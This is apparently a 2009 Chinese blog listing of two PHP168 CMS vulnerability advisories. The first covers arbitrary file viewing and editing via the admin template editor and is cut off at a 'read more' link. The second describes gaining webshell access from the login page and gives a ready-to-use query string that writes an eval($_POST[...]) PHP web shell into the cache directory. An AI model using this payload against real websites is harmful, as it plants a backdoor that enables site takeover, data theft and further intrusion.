PHP168后台查看/修改任意文件漏洞

日期: 2009/11/06 分类: 技术杂文 标签: , 2 个回复

漏洞信息:
影响程序:PHP168所有带模板编辑的版本
作者:esnra
发布于:http://www.3hack.com/
利用条件:有权限进入后台
利用方法:
进入功能中心,找到风格/模板设置,选风格管理

阅读全文

PHP168 6.0及以下版本漏洞

日期: 2009/09/09 分类: 技术杂文 标签: , 添加回复

来源:chinesehonker

危险等级:高

影响版本:PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。

测试语句:
?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?